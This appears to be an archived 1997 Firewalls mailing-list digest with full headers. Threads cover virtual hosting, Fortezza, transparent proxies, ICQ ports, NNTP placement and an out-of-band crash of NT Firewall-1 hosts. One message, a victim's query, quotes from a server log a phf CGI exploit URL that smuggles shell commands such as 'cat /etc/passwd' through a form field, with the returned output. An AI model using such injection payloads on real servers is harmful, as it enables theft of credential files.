id QAA25342 for ; Wed, 4 Jun 1997 16:48:25 -0700 (PDT) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id QAA27280 for ; Wed, 4 Jun 1997 16:25:05 -0700 (PDT) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0wZPO5-0004FdC (Debian Smail-3.2 1996-Jul-4 #2); Thu, 5 Jun 1997 01:22:41 +0200 (MET DST) Received: from lina.inka.de (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Thu, 5 Jun 97 01:22 MET DST Received: by lina.inka.de id m0wZP9A-00014MC (Debian Smail-3.2 1996-Jul-4 #2); Thu, 5 Jun 1997 01:07:16 +0200 (CEST) Message-Id: Date: Thu, 5 Jun 1997 01:07:14 +0200 From: Bernd Eckenfels To: Anton J Aylward Cc: "Mark Horn [ Net Ops ]" , Firewalls@GreatCircle.COM Subject: Re: Plug-gw- One to many relationship References: <3.0.32.19970604114909.00952700@the-wire.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.67 In-Reply-To: <3.0.32.19970604114909.00952700@the-wire.com>; from Anton J Aylward on Wed, Jun 04, 1997 at 11:49:24AM -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, > No, no, no, what *I* want and what about 10^7 other sites want is this... > > client A W server C > firewall server D > client B server F > server G > server H > server I > server K there are 2 Solutions (if we are talking about WWW) a) use different Ports W:80 -> C:80 W:8080 -> D:80 W:8081 -> E:80 b) use the Host Command from HTTP which no browser nor Server does Support yet :) To get back on it, its not a problem of software, but of design. There is no way a Server can tell what the host part of an URL was other than looking at the connected address:port Combination. If you have only one valid address youcan run only one server at a given port. Greetings Bernd -- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( .. ) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy From owner-firewalls-outgoing Thu Jun 5 02:46:26 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA27268 for firewalls-outgoing; Wed, 4 Jun 1997 13:58:00 -0700 (PDT) Received: from relay1.shore.net ([192.233.85.129]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA18207 for ; Wed, 4 Jun 1997 13:11:13 -0700 (PDT) Received: from [198.115.179.81] (vin.shore.net [198.115.179.81]) by relay1.shore.net (8.8.3/8.8.3) with ESMTP id QAA18326 for ; Wed, 4 Jun 1997 16:14:20 -0400 (EDT) Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 4 Jun 1997 16:13:10 -0500 To: firewalls@greatcircle.com From: Vin McLellan Subject: Fortezza's Fate?? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anyone out there watching Fortezza's Doom unfold? Fortezza was the US DoD's crypto (PCMCIA only?) smartcard, part of the Capstone family introduced back with the original Clipper proposal for non-classified DoD use and other US government applications -- and, for awhile, heavily promoted to the civilian US government agencies, as well as to industry. Fortezza has Skipjack symmetric crypto (160 bit keys, I think) as well as full public-key functionality, but it was designed to complement the Clipper policy, so I recall it tossed off a LEAF escrow copy of each session key to government-established secure "key warehouses" in DoD, Commerce, and Treasury, maybe among other agencies. I presume many of the prominent firewall vendors got involved, since for a time it looked like this was going to be the authentication device used by the US DoD, other federal government employees, and contractors accessing federal systems. Fortezza is -- was? -- also obviously a big deal for network and firewall administrators (and users) at many US government agencies. There are a lot of rumors buzzing around DC these days to the effect that NSA and the Joint Chiefs have tossed in the towel and will, within weeks, approve DoD purchases for non-Fortezza security systems, for both strong authentication, and (I presume) more standard PKI. I understand they have been briefing US.gov security staff and the contractors who have been working on Fortezza apps. I also understand that DoD is considering approving Fortezza in software applications?!? I'm seeking some perspective on what happened and why. I'm intrigued, but ill informed. (Please feel free to correct anything above.) Suerte, _Vin "Cryptography is like literacy in the Dark Ages. Infinitely potent, for good and ill... yet basically an intellectual construct, an idea, which by its nature will resist efforts to restrict it to bureaucrats and others who deem only themselves worthy of such Privilege." _ A thinking man's Creed for Crypto/ vbm. * Vin McLellan + The Privacy Guild + * 53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548 From owner-firewalls-outgoing Thu Jun 5 02:53:28 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA09193 for firewalls-outgoing; Wed, 4 Jun 1997 15:16:06 -0700 (PDT) Received: from kaiser.cip.physik.uni-muenchen.de (kaiser.cip.physik.uni-muenchen.de [141.84.136.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA09166 for ; Wed, 4 Jun 1997 15:15:57 -0700 (PDT) Received: from server.muc.de (dial020.ppp.lrz-muenchen.de [129.187.24.20]) by kaiser.cip.physik.uni-muenchen.de with ESMTP id AAA22101 (8.6.10/IDA-1.6); Thu, 5 Jun 1997 00:19:28 +0200 Received: from chi.muc.de (root@chi.muc.de [192.168.1.2]) by server.muc.de (8.7.5/8.7.3) with SMTP id AAA10195; Thu, 5 Jun 1997 00:01:32 +0200 Message-ID: <3395E581.22635C3A@physik.uni-muenchen.de> Date: Thu, 05 Jun 1997 00:00:33 +0200 From: Hans Aschauer X-Mailer: Mozilla 3.01Gold (X11; I; Linux 2.0.30 i586) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Transparent Proxies for Linux Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, I thought that the transparent proxy option in the linux kernel looks quite interesting, but up to now I only found a http- and a vdo-proxy at ftp://ftp.ris.fr/pub/linux/proxy (can anyone help my what a vdo-proxy is?) Do you know of other proxies which can be used in a transparent mode (with linux) and which are free? Are there perhaps patches for other proxy products? TIA, Hans. From owner-firewalls-outgoing Thu Jun 5 02:54:57 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA15316 for firewalls-outgoing; Wed, 4 Jun 1997 15:57:44 -0700 (PDT) Received: from ds1.gl.umbc.edu (ds1.gl.umbc.edu [130.85.3.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA15308 for ; Wed, 4 Jun 1997 15:57:39 -0700 (PDT) Received: from umbc10.umbc.edu (jjasen1@umbc10.umbc.edu [130.85.3.14]) by ds1.gl.umbc.edu (8.8.5/8.6.9) with ESMTP id TAA20655; Wed, 4 Jun 1997 19:01:30 -0400 (EDT) Received: from localhost (jjasen1@localhost) by umbc10.umbc.edu (8.8.5/8.6.9) with SMTP id TAA10970; Wed, 4 Jun 1997 19:01:30 -0400 (EDT) X-Authentication-Warning: umbc10.umbc.edu: jjasen1 owned process doing -bs Date: Wed, 4 Jun 1997 19:01:30 -0400 (EDT) From: "John \"E.R.\" Jasen" X-Sender: jjasen1@umbc10.umbc.edu To: Rabid Wombat cc: Jyri Kaljundi , Firewalls@GreatCircle.COM Subject: Re: Security Crazy In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > On Sun, 1 Jun 1997, Jyri Kaljundi wrote: > > Sat, 31 May 1997, Marcus J. Ranum wrote: > > > > >> my CEO has gone security crazy [...] win95 > > > > > > He's a bit unclear on the concept, isn't he? > > > > I am pretty sure there actually are good commercial systems available to > > make large number of win95 machines much more secure than as they are > > out-of-box. Not that this pertains to firewalls, but if he's using MicroSoft and security in the same sentence, then he really should look at NT. -- "What do you want?" -- Mr. Morden, Microsoft Sales VP -- John E. Jasen // Systems Alchemist \\ jjasen1@umbc.edu -- -- My views are not those of UMBC, AFAIK. HTH. HAND. -- From owner-firewalls-outgoing Thu Jun 5 03:36:18 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA04563 for firewalls-outgoing; Wed, 4 Jun 1997 14:40:06 -0700 (PDT) Received: from dns1.tc.net (dns1.tc.net [208.205.78.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id OAA04541 for ; Wed, 4 Jun 1997 14:39:55 -0700 (PDT) Received: from UNKNOWN [208.205.78.200] by dns1.tc.net for id RAA00276; Wed Jun 4 17:43:46 1997 Received: (from doug@localhost) by ono.tc.net (8.7.6/8.7.3) id RAA22425; Wed, 4 Jun 1997 17:43:45 -0400 Subject: Re: firewall setup References: Date: 04 Jun 1997 17:43:44 -0400 In-Reply-To: "Sameer R. Manek"'s message of Wed, 4 Jun 1997 10:14:45 -0700 (PDT) Message-ID: Lines: 28 X-Mailer: Gnus v5.2.39/Emacs 19.34 To: "Sameer R. Manek" From: Douglas McNaught Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk "Sameer R. Manek" writes: > The other day someone drew an asci map of how the network should be setup. > It looked something like this > > ---> gateway -+-> firewall ---> internal net > | > mail server > > In this setup i don't really seem to understand the purpose of the > gateway. here, my intro to tcp/ip protocols book defines a gateway as a > device that transplates between protocols. Your book is, well, incomplete. 'Gateway' is often synonymous with 'router'. Here, I think they're talking about the IP router that connects you to the Internet. Also, that diagram seems to indicate that your mail server lives outside the firewall. I would not do this, since it makes the mail machine vulnerable to SMTP attacks. Proxy SMTP at the firewall and keep the mail server inside. -Doug -- sub g{my$i=index$t,$_[0];($i%5,int$i/5)}sub h{substr$t,5*$_[1]+$_[0],1}sub n{( $_[0]+4)%5}$t='encryptabdfghjklmoqsuvwxz';$c='fxmdwbcmagnyubnyquohyhny';while( $c=~s/(.)(.)//){($w,$x)=g$1;($y,$z)=g$2;$w==$y&&($p.=h($w,n$x).h($y,n$z))or$x== $z&&($p.=h(n$w,$x).h(n$y,$z))or($p.=h($y,$x).h($w,$z))}$p=~y/x/ /;print$p,"\n"; From owner-firewalls-outgoing Thu Jun 5 03:46:11 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id CAA28324 for firewalls-outgoing; Thu, 5 Jun 1997 02:58:20 -0700 (PDT) Received: from torga.ci.uminho.pt (torga.ci.uminho.pt [193.136.16.251]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id CAA28233 for ; Thu, 5 Jun 1997 02:57:54 -0700 (PDT) Received: from orpheu-serv by torga.ci.uminho.pt (5.4R3.10/140.2) id AA04113; Thu, 5 Jun 1997 11:00:16 +0100 Received: by orpheu.ci.uminho.pt (5.4R3.10/140.2) id AA04502; Thu, 5 Jun 1997 11:00:56 +0200 Date: Thu, 5 Jun 1997 11:00:55 +0200 (MET DST) From: Margarida Oliveira - Paco To: Petr Snajdr , firewalls@GreatCircle.COM Subject: ssh client for MacInstosh (System 7.6.1) Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi. Does anyone Know of a ssh client for MacIntosh ? Thanks in advance. Margarida. =================================================== Margarida Oliveira : Phone: +351-53-601159 University of Minho : mailto:mo@ci.uminho.pt Braga - Portugal : http://www.uminho.pt From owner-firewalls-outgoing Thu Jun 5 04:00:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id DAA29097 for firewalls-outgoing; Thu, 5 Jun 1997 03:04:35 -0700 (PDT) Received: from cbu.pvtnet.cz (cbu.pvtnet.cz [194.149.105.18]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id DAA29084 for ; Thu, 5 Jun 1997 03:04:23 -0700 (PDT) Received: from snajdr.pvt.net (snajdr.pvt.net [194.149.103.204]) by cbu.pvtnet.cz (8.8.5/8.7.3) with SMTP id MAA22208; Thu, 5 Jun 1997 12:13:44 +0200 (MET DST) Message-ID: <33968FAE.61AAD4B2@pvt.net> Date: Thu, 05 Jun 1997 12:06:38 +0200 From: Petr Snajdr X-Mailer: Mozilla 3.01 (X11; I; Linux 2.0.30 i586) MIME-Version: 1.0 To: Margarida Oliveira - Paco CC: firewalls@GreatCircle.COM Subject: Re: ssh client for MacInstosh (System 7.6.1) References: Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Margarida Oliveira - Paco wrote: > > Hi. > > Does anyone Know of a ssh client for MacIntosh ? F-Secure SSH for the Macintosh 30 Day Trial Version To run the client on your machine you need: System 7.0 or later, 68020 or better, 3 megabytes free RAM, 2 megabytes free disk space, MacTCP or Open Transport. http://www.datafellows.com/f-secure/ssh/mac/ Other F­Secure SSH Clients (Windows/Unix): http://www.datafellows.com/f-secure/fclintp.htm Petr Snajdr From owner-firewalls-outgoing Thu Jun 5 05:31:11 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA14496 for firewalls-outgoing; Thu, 5 Jun 1997 05:06:28 -0700 (PDT) Received: from nebula.online.ee (nebula.online.ee [194.106.96.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA14479 for ; Thu, 5 Jun 1997 05:06:14 -0700 (PDT) Received: from localhost (jk@localhost) by nebula.online.ee (8.8.3/8.8.3) with SMTP id PAA00491; Thu, 5 Jun 1997 15:08:47 +0300 (EET DST) Date: Thu, 5 Jun 1997 15:08:46 +0300 (EET DST) From: Jyri Kaljundi X-Sender: jk@nebula To: Daniel Strawson cc: Greg Loffel , fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 4 Jun 1997, Daniel Strawson wrote: > We tried it and, yes we managed to crash an NT based Firewall-1 system. > This is odd since (if memory serves) the packets should be dropped on the > floor by the stateful inspection module. You mean you can crash and NT FW-1 by sending OOB data to it?! That's scary if it is true and should be addressed by Check Point ASAP! What I have always thought of FW-1 is that it operates at quite low level inside the OS kernel, that as long as you filter everything the network bugs in the OS don't really matter, as the packets never reach FW-1.=20 If sending some bytes of data to FW1 crashes it and the OS, this combination (FW1+NT) should not be used as a firewall solution at all. May be someone from CP could explain, how much do the bugs in the OS matter once FW1 is installed. J=FCri From owner-firewalls-outgoing Thu Jun 5 07:31:40 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA20091 for firewalls-outgoing; Thu, 5 Jun 1997 06:38:21 -0700 (PDT) Received: from mail.isis.co.za (mail.isis.co.za [196.28.22.18]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id GAA20084 for ; Thu, 5 Jun 1997 06:38:09 -0700 (PDT) Received: from MS254.isis.co.za (mail.isis.co.za [196.28.22.1]) by mail.isis.co.za (8.6.12/8.6.9) with SMTP id PAA22786 for ; Thu, 5 Jun 1997 15:41:47 +0200 Received: by MS254.isis.co.za with Microsoft Mail id <01BC71C6.F91382C0@MS254.isis.co.za>; Thu, 5 Jun 1997 15:41:45 +-200 Message-ID: <01BC71C6.F91382C0@MS254.isis.co.za> From: Pat Verner To: "'firewalls@greatcircle.com'" Subject: ICQ and udp port 4000 Date: Thu, 5 Jun 1997 15:41:42 +-200 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have just had a request to open port 4000 for outgoing UDP in order to support a product called ICQ. I must confess to being loathe to open unnecessary udp ports, but don't want to let prejudice influence me unduly.. Does anyone know anything about this product, and what the security implications would be in opening the port? Any comments would be appreciated. There is a blurb about ICQ on http://www.mirabilis.com/ Thanks in anticipation .. =Pat From owner-firewalls-outgoing Thu Jun 5 07:43:18 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA19792 for firewalls-outgoing; Thu, 5 Jun 1997 06:25:54 -0700 (PDT) Received: from tlingit.elmail.co.uk (tlingit.elmail.co.uk [193.122.233.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA19781 for ; Thu, 5 Jun 1997 06:25:44 -0700 (PDT) Received: from mojave.elmail.co.uk (mojave.elmail.co.uk [193.112.20.14]) by tlingit.elmail.co.uk with SMTP id OAA06545 (2.1.1h-8.8.5/2.1); Thu, 5 Jun 1997 14:33:14 +0100 (BST) Date: Thu, 5 Jun 1997 14:24:39 +0100 (BST) From: Daniel Strawson To: Jyri Kaljundi cc: Greg Loffel , fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hang on a moment. Let me put this in perspective. As I understand it, this problem results from sending packets with a particular IP option set in the header. (Please confirm I'm right here someone). Firewall _SHOULD_ drop all packets with IP options set. This would mean that all Firewall-1 systems and systems behind Firewall-1 are impervious to this attack. (something for Checkpoint to be proud of). Unfortunately this is not the case - as I say I've managed to get NT to crash with FW-1 installed. Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to crash, you get the NT system that it is running on to crash, so it is not an insecurity, but a claimed feature that doesn't work. So, either - - The IP Options drop code in FW-1 doesn't work. or - I do not properly understand this attack and it does not work as I imagine - in this case, please correct me. Cheers, Daniel On Thu, 5 Jun 1997, Jyri Kaljundi wrote: > On Wed, 4 Jun 1997, Daniel Strawson wrote: >=20 > > We tried it and, yes we managed to crash an NT based Firewall-1 system. > > This is odd since (if memory serves) the packets should be dropped on t= he > > floor by the stateful inspection module. >=20 > You mean you can crash and NT FW-1 by sending OOB data to it?! > That's scary if it is true and should be addressed by Check Point ASAP! >=20 > What I have always thought of FW-1 is that it operates at quite low level > inside the OS kernel, that as long as you filter everything the network > bugs in the OS don't really matter, as the packets never reach FW-1.=20 >=20 > If sending some bytes of data to FW1 crashes it and the OS, this > combination (FW1+NT) should not be used as a firewall solution at all. Ma= y > be someone from CP could explain, how much do the bugs in the OS matter > once FW1 is installed. >=20 > J=FCri >=20 >=20 From owner-firewalls-outgoing Thu Jun 5 07:47:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA19986 for firewalls-outgoing; Thu, 5 Jun 1997 06:31:51 -0700 (PDT) Received: from gate (MNA-cal-mcc-a-pvc253.econnect.net [204.50.214.50]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA19964 for ; Thu, 5 Jun 1997 06:31:41 -0700 (PDT) Received: from a01fs002.nsci.net ([10.1.1.20]) by gate.mcc.net with ESMTP id <324843-14627>; Thu, 5 Jun 1997 07:35:24 -0600 Received: by A01FS002.mcc.net with Internet Mail Service (5.0.1457.3) id ; Thu, 5 Jun 1997 07:35:23 -0600 Message-ID: From: "Paquette, Trevor" To: "'John Kemker'" Cc: "'firewalls@GreatCircle.COM'" Subject: RE: ISP Connection Date: Thu, 5 Jun 1997 07:35:21 -0600 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The decision is up to the individual company. With proper communication and feedback, there is no reason why you cannot trust another organization to run your firewall for you. Do you trust your mechanic to run and fix your car? Most of the people out there the answer is yes. Some people do it themselves. (some people also fail miserably at doing it themselves, and likewise some mechanics are just as bad). But when you find the right one.. you keep your business relationship with them. You trust them to keep your car safe and in running condition whenever you need it. I know that analogy is stretching it, but it does come close to the relationship that you can have with the right ISP and Firewall service administrator. > -----Original Message----- > From: John Kemker [SMTP:john.kemker@pfsfhq.com] > Sent: Wednesday, June 04, 1997 1:09 PM > To: firewalls@GreatCircle.COM > Subject: Re: ISP Connection > > Handing over your firewall administration to another organization is > not, > in my personal opinion, a wise move. You are saying, in effect, that > you > implicitly trust that organization to always think and act in your > organization's best interest. This is not realistic. > > "Only those defenses are good, certain and durable, which depend on > yourself alone and your own ability." _The_Prince_ --N. Machiavelli > > Administer your firewall yourself. Put it up yourself, define the > policies > yourself and maintain it yourself. > > =========== REPLY PARTITION =========== > > On 06/04/97, at 12:01 PM, Mariko Yashada wrote: > > > > > > > >Here is a related question: > > > >There is another local ISP who will connect us at T1 and install a > firewall > >at our location. They will then administer the firewall remotely from > their > >location. They support three different firewalls, Gauntlet, > Firewall-1 and > >Borderware. The advantage is the savings in admin costs. Has anyone > had > any > >experience with this type of arrangement? We have also talked to BBN > about > >their Site Patrol product, which is a remotely managed Gauntlet. > > > >Thanks, > > > >Mariko > > > > John E. Kemker III > Systems Engineer, Primerica Financial Services > 3120 Breckinridge Blvd., Duluth, GA 30199 From owner-firewalls-outgoing Thu Jun 5 08:16:41 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA20188 for firewalls-outgoing; Thu, 5 Jun 1997 06:42:17 -0700 (PDT) Received: from kcgw1.att.com (kcgw1.att.com [192.128.133.151]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id GAA20180 for ; Thu, 5 Jun 1997 06:42:08 -0700 (PDT) Received: from hogpa.ho.att.com by kcig1.att.att.com (SMI-8.6/EMS-1.2 sol2) id IAA26391; Thu, 5 Jun 1997 08:38:07 -0500 Received: from hogpb.ho.att.com by hogpa.ho.att.com (5.0/EMS-1.2 sol2) id AA27715; Thu, 5 Jun 1997 09:46:02 -0400 Received: from bdboyle.ho.att.com by hogpb.ho.att.com (SMI-8.6/EMS-1.1 Sol2) id JAA02854; Thu, 5 Jun 1997 09:46:02 -0400 Date: Thu, 5 Jun 1997 09:46:02 -0400 Message-Id: <199706051346.JAA02854@hogpb.ho.att.com> X-Sender: bdboyle@hogpa.ho.att.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Jyri Kaljundi From: "Bryan D. Boyle" Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 03:08 PM 6/5/97 +0300, you wrote: >You mean you can crash and NT FW-1 by sending OOB data to it?! >That's scary if it is true and should be addressed by Check Point ASAP! > It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, since the OS is not in their control. They can only operate (or be as secure as) at the least common denominator level of the underlying OS. >What I have always thought of FW-1 is that it operates at quite low level >inside the OS kernel, that as long as you filter everything the network >bugs in the OS don't really matter, as the packets never reach FW-1. Nothing except MS code operates in the NT kernel. This problem is with what happens when you send oob data to a stack (MS) that is tightly integrated with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS interface and control mechanism itself is crap. Of course, on UN*X systems, this is not the case. This is a signal example of the difference between designing for peer review of your security model and designing for what gets good trade publication reviews. > >If sending some bytes of data to FW1 crashes it and the OS, this >combination (FW1+NT) should not be used as a firewall solution at all. May >be someone from CP could explain, how much do the bugs in the OS matter >once FW1 is installed. If there is an overall architectural problem with NT as it is, then the OS bugs matter A LOT. But, of course, those that say you can trust a black box solution since the vendors are trustworthy are quite quiet on this regard... I would agree that you should ignore NT as an OS platform in a security solution right now. Just my opinion, $.02 US, etc. Flames to /dev/null. -- Bryan D. Boyle | LOGICAL: bdboyle@att.com 201-386-8584 #include | VIRTUAL: http://www.access.digex.net/~bdboyle AT&T Laboratories, Inc. | PHYSICAL: Whippany, NJ | HISTORICAL: HQ, 6th Battalion, Army of No. VA. "What country can preserve its liberties, if its rulers are not warned from time to time, that its people preserve the spirit of resistance?" -Thomas Jefferson, 1787 From owner-firewalls-outgoing Thu Jun 5 08:22:46 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA20917 for firewalls-outgoing; Thu, 5 Jun 1997 07:08:08 -0700 (PDT) Received: from guru.unixpros.com (guru.unixpros.com [207.17.234.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id HAA20909 for ; Thu, 5 Jun 1997 07:07:58 -0700 (PDT) Message-Id: <199706051407.HAA20909@honor.greatcircle.com> Received: by guru.unixpros.com (1.38.193.4/16.2) id AA06420; Thu, 5 Jun 1997 10:10:54 -0400 From: Stan Wnuck Subject: psswd HACK To: firewalls@GreatCircle.COM Date: Thu, 5 Jun 97 10:10:54 EDT Mailer: Elm [revision: 70.85] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello again, Thanks to all of the responces that I have received on this. One more question.... exactly how did they get my passwd file? I typed in the URL from my log file into my browser.... http://myserver.somwhere.com/cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0 and I got this in return in my browser.... Query Results /usr/local/bin/ph -m -s ns.uiuc.edu\ cat /etc/passwd\ ypcat passwd\ pwd\ id\ uname -a\ name=foo Where is the passwd file? OK! Let's say that they did get my passwd file..... How much damage can they do if I have a firewall in place that my web server sits behind? The only services available from this host to the Internet is http, dns, and smtp. So services like ftp and telnet would be denied if they tried. Is there something I am missing? Thanks again, Stan Wnuck swnuck@unixpros.com Unixpros, Inc. 10 Industrial Way East (908) 389-3295 x542 Eatontown, NJ 07724 (908) 389-5461 Fax PM-CHS Technology Insertion Office Ft. Monmouth Army Base, NJ (908) 427-2033 / 427-6963 From owner-firewalls-outgoing Thu Jun 5 08:57:33 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA20309 for firewalls-outgoing; Thu, 5 Jun 1997 06:47:04 -0700 (PDT) Received: from mx2.netfrontier.com (mx2.netfrontier.com [206.20.201.52]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA20302 for ; Thu, 5 Jun 1997 06:46:58 -0700 (PDT) Received: from shangrila ([206.20.201.38]) by mx2.netfrontier.com (post.office MTA v2.0 0813 ID# 0-29676U160) with SMTP id AAA365; Thu, 5 Jun 1997 06:46:03 -0700 Message-Id: <3.0.32.19970605065915.00a1b700@mx2.netfrontier.com> X-Sender: pcoppinger@mx2.netfrontier.com X-Mailer: Windows Eudora Pro Version 3.0 (32) To: Vin McLellan , firewalls@greatcircle.com From: pcoppinger@appsware.com (Paul Coppinger) Subject: Re: Fortezza's Fate?? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 5 Jun 1997 06:46:03 -0700 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 04:13 PM 6/4/97 -0500, Vin McLellan wrote: > There are a lot of rumors buzzing around DC these days to the >effect that NSA and the Joint Chiefs have tossed in the towel and will, >within weeks, approve DoD purchases for non-Fortezza security systems, for >both strong authentication, and (I presume) more standard PKI. I >understand they have been briefing US.gov security staff and the >contractors who have been working on Fortezza apps. I'm, of course, interested in your sources of this information, however I'm more interested in learning what kinds of security systems they intent to use in place of Fortezza. I just can't see protecting classified information using *only* a software token... > I also understand that DoD is considering approving Fortezza in >software applications?!? Are you suggesting that the Skipjack algorithm is about to be published? :) __ _____ _____ ______ / || __ \ | __ \ / _____) Paul Coppinger / || |__) )| |__) )\_____ APPS Software International / /| || ___/ | ___/ ____ \ 4417 North Saddlebag Trail, Suite 1 / __ || | | | ____) ) Tel: 602.947-2227 /_/ |_||_| |_| (_____/ Fax: 602.947-2280 "THE AUTOMATION BRIDGE" From owner-firewalls-outgoing Thu Jun 5 09:12:25 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA16823 for firewalls-outgoing; Thu, 5 Jun 1997 05:51:57 -0700 (PDT) Received: from coop.crn.org (coop.crn.org [198.209.95.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA16809 for ; Thu, 5 Jun 1997 05:51:49 -0700 (PDT) Received: from wgateway.kcmo.org by coop.crn.org (AIX 3.2/UCB 5.64/4.03) id AA21378; Thu, 5 Jun 1997 07:43:51 -0500 Message-Id: <3396B74D.333@coop.crn.org> Date: Thu, 05 Jun 1997 07:55:42 -0500 From: Joe Doetzl Reply-To: doetzl@coop.crn.org X-Mailer: Mozilla 3.0Gold (WinNT; I) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: NNTP server in DMZ? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have a customer who wishes to install a NNTP server. It is likely that they will host internal newsgroups that will need to be protected. The internal network is in the address range reserved for private internetworks. They are using SOCKS for access from the internal network to the Internet. Traffic to the DMZ is limited to ftp, http, dns, smtp and ntp. With that in mind is it possible to put the NNTP server on the inside and still get a feed from an upstream provider? This solution would eliminate the need for SOCKSified nntp clients. Or should the NNTP server be placed in the DMZ with a registered IP and FQDN and the clients access it via SOCKS? I have a hunch that perhaps NAT would provide an even better solution? Thank you, --Joe From owner-firewalls-outgoing Thu Jun 5 09:38:09 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA18110 for firewalls-outgoing; Thu, 5 Jun 1997 06:02:46 -0700 (PDT) Received: from panenergy.com (igate.panenergy.com [198.64.254.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA18103 for ; Thu, 5 Jun 1997 06:02:39 -0700 (PDT) Received: by igate.panenergy.com id <36891-2>; Thu, 5 Jun 1997 08:05:02 -0500 Message-Id: 